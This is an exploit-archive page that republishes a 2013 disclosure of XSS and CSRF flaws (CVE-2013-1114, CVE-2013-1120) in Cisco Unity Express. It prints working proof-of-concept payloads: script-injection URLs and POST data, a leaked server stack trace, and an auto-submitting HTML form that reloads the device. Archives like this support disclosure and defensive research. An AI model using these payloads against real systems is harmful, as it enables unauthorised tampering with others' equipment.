Menu

Search for hundreds of thousands of exploits

"Cisco Unity Express - Multiple Vulnerabilities"

Author

Exploit author

"Jacob Holcomb"

Platform

Exploit platform

jsp

Release date

Exploit published date

2013-02-05

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
# Exploit Title: Cisco Unity Express Multiple Vulnerabilities
# Reported: December 2012
# Disclosed: February 2013
# Author: Jacob Holcomb of Independent Security Evaluators
# CVE: XSS - CVE-2013-1114 and CSRF - CVE-2013-1120
# http://infosec42.blogspot.com/2013/02/cisco-unity-express-vulnerabilites.html

Cisco Advisory
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1114
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1120 

Proof of Concept
XSS - CVE-2013-1114:
GET:
Reflective XSS & Info disclosure
http://X.X.X.X/Web/SA2/ScriptList.do?gui_pagenotableData=><script>alert(42)</script>

Information Disclosure
Location: /Web/WEB-INF/screens/main.jsp
Error Location: /Web/WEB-INF/screens/prompts/ListScripts.jsp
Internal Servlet Error:

javax.servlet.ServletException: invalid character at position 1 in >
org.apache.jasper.runtime.PageContextImpl.handlePageException (Unknown Source)
WEB_0002dINF.screens.prompts.ListScripts._jspService (ListScripts.java:2245)
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
org.apache.tomcat.core.Handler.invoke (Unknown Source)
org.apache.tomcat.core.Handler.service (Unknown Source)
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.doInclude (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.access$000 (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)
java.security.AccessController.doPrivileged (AccessController.java:273)
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.include (Unknown Source)
org.apache.jasper.runtime.PageContextImpl.include (Unknown Source)
WEB_0002dINF.screens.main._jspService (main.java:396)
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
org.apache.tomcat.core.Handler.invoke (Unknown Source)
org.apache.tomcat.core.Handler.service (Unknown Source)
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.doForward (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.access$100 (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)
java.security.AccessController.doPrivileged (AccessController.java:273)
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.forward (Unknown Source)
org.apache.struts.action.ActionServlet.processActionForward (ActionServlet.java:1759)
org.apache.struts.action.ActionServlet.process (ActionServlet.java:1596)
com.cisco.aesop.vmgui.framework.WebController.process (WebController.java:157)
org.apache.struts.action.ActionServlet.doGet (ActionServlet.java:492)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
org.apache.tomcat.core.Handler.invoke (Unknown Source)
org.apache.tomcat.core.Handler.service (Unknown Source)
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
org.apache.tomcat.core.ContextManager.internalService (Unknown Source)
org.apache.tomcat.core.ContextManager.service (Unknown Source)
org.apache.tomcat.modules.server.Http10Interceptor.processConnection (Unknown Source)
org.apache.tomcat.util.net.TcpWorkerThread.runIt (Unknown Source)
org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run (Unknown Source)
java.lang.Thread.run (Thread.java:777)

Root cause:
java.lang.NumberFormatException: invalid character at position 1 in >
java.lang.Throwable. (Throwable.java:166)
java.lang.Integer.parseInt (Integer.java:775)
java.lang.Integer.parseInt (Integer.java:262)
com.cisco.aesop.gui.taglibs.PagingTableTag.doAfterBody (PagingTableTag.java:274)
WEB_0002dINF.screens.prompts.ListScripts._jspService (ListScripts.java:1903)
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
org.apache.tomcat.core.Handler.invoke (Unknown Source)
org.apache.tomcat.core.Handler.service (Unknown Source)
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.doInclude (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.access$000 (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)
java.security.AccessController.doPrivileged (AccessController.java:273)
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.include (Unknown Source)
org.apache.jasper.runtime.PageContextImpl.include (Unknown Source)
WEB_0002dINF.screens.main._jspService (main.java:396)
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
org.apache.tomcat.core.Handler.invoke (Unknown Source)
org.apache.tomcat.core.Handler.service (Unknown Source)
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.doForward (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.access$100 (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)
java.security.AccessController.doPrivileged (AccessController.java:273)
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)
org.apache.tomcat.facade.RequestDispatcherImpl.forward (Unknown Source)
org.apache.struts.action.ActionServlet.processActionForward (ActionServlet.java:1759)
org.apache.struts.action.ActionServlet.process (ActionServlet.java:1596)
com.cisco.aesop.vmgui.framework.WebController.process (WebController.java:157)
org.apache.struts.action.ActionServlet.doGet (ActionServlet.java:492)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
javax.servlet.http.HttpServlet.service (HttpServlet.java)
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)
org.apache.tomcat.core.Handler.invoke (Unknown Source)
org.apache.tomcat.core.Handler.service (Unknown Source)
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)
org.apache.tomcat.core.ContextManager.internalService (Unknown Source)
org.apache.tomcat.core.ContextManager.service (Unknown Source)
org.apache.tomcat.modules.server.Http10Interceptor.processConnection (Unknown Source)
org.apache.tomcat.util.net.TcpWorkerThread.runIt (Unknown Source)
org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run (Unknown Source)
java.lang.Thread.run (Thread.java:777)



POST:
Persistent XSS
http://X.X.X.X/Web/SA3/AddHoliday.do
POST Data: holiday.description=><script>alert(42)</script>&submitType=ADD


CSRF - CVE-2013-1120:

<html>
<!-- # Exploit Title: Cisco Unity Express CSRF
     # Date: Discovered and reported December 2012
     # Disclosed: February 2013
     # Author: Jacob Holcomb of Independent Security Evaluators
     # Software: Cisco Unity Express
     # CVE : CVE-2013-1120 for the CSRF
     # Note: All the HTML forms are susceptible to forgery -->

<head>
<title>Reload Cisco Unity Express CSRF</title>
</head>

<body>

<form name="CUEreload" action="http://X.X.X.X/Web/SA/SaveConfiguration.do" method="post">
<input type="hidden" name="submitType" value="RELOAD"/>
</form>

<script>
document.CUEreload.submit();
</script>

</body>
</html>
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-11-12 "Atlassian Confluence 6.15.1 - Directory Traversal" webapps jsp max7253
2019-11-12 "Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit)" webapps jsp max7253
2019-09-16 "NetGain EM Plus 10.1.68 - Remote Command Execution" webapps jsp azams
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection" webapps jsp "Wietse Boonstra"
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution" webapps jsp "Wietse Boonstra"
2019-07-26 "Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)" webapps jsp "Wietse Boonstra"
2019-06-11 "Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting" webapps jsp "Valerio Brussani"
2019-06-05 "Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery" webapps jsp k8gege
2019-05-10 "dotCMS 5.1.1 - HTML Injection" webapps jsp "Ismail Tasdelen"
2019-03-11 "OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)" webapps jsp AkkuS
Release Date Title Type Platform Author
2014-01-19 "ASUS RT-N56U - Remote Buffer Overflow (ROP)" remote hardware "Jacob Holcomb"
2013-08-21 "Xibo - Cross-Site Request Forgery" webapps php "Jacob Holcomb"
2013-08-21 "Xibo - 'layout' HTML Injection" webapps php "Jacob Holcomb"
2013-07-28 "TRENDnet TEW-812DRU - Cross-Site Request Forgery/Command Injection Root" webapps hardware "Jacob Holcomb"
2013-07-27 "ASUS RT-AC66U - 'acsd' Remote Command Execution" remote linux_mips "Jacob Holcomb"
2013-07-01 "Static HTTP Server 1.0 - Local Overflow (SEH)" local windows "Jacob Holcomb"
2013-06-27 "PCMan FTP Server 2.0.7 - Remote Buffer Overflow" remote windows "Jacob Holcomb"
2013-04-25 "Light HTTPd 0.1 (Windows) - Remote Buffer Overflow" remote windows "Jacob Holcomb"
2013-04-25 "Belkin F5D8236-4 Router - Cross-Site Request Forgery" remote hardware "Jacob Holcomb"
2013-04-24 "TP-Link TL-WR1043N Router - Cross-Site Request Forgery" remote hardware "Jacob Holcomb"
2013-04-19 "D-Link DIR-865L - Cross-Site Request Forgery" remote hardware "Jacob Holcomb"
2013-03-19 "Verizon Fios Router MI424WR-GEN3I - Cross-Site Request Forgery" webapps hardware "Jacob Holcomb"
2013-02-05 "Cisco Unity Express - Multiple Vulnerabilities" webapps jsp "Jacob Holcomb"
2012-12-13 "Cisco Wireless Lan Controller 7.2.110.0 - Multiple Vulnerabilities" dos hardware "Jacob Holcomb"
2012-10-30 "Freefloat FTP Server - 'PUT' Remote Buffer Overflow" remote windows "Jacob Holcomb"
2012-09-27 "JAMF Casper Suite MDM - Cross-Site Request Forgery" webapps jsp "Jacob Holcomb"
2012-09-17 "Netsweeper WebAdmin Portal - Multiple Vulnerabilities" webapps php "Jacob Holcomb"
2012-01-24 "stoneware webnetwork6 - Multiple Vulnerabilities" webapps jsp "Jacob Holcomb" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected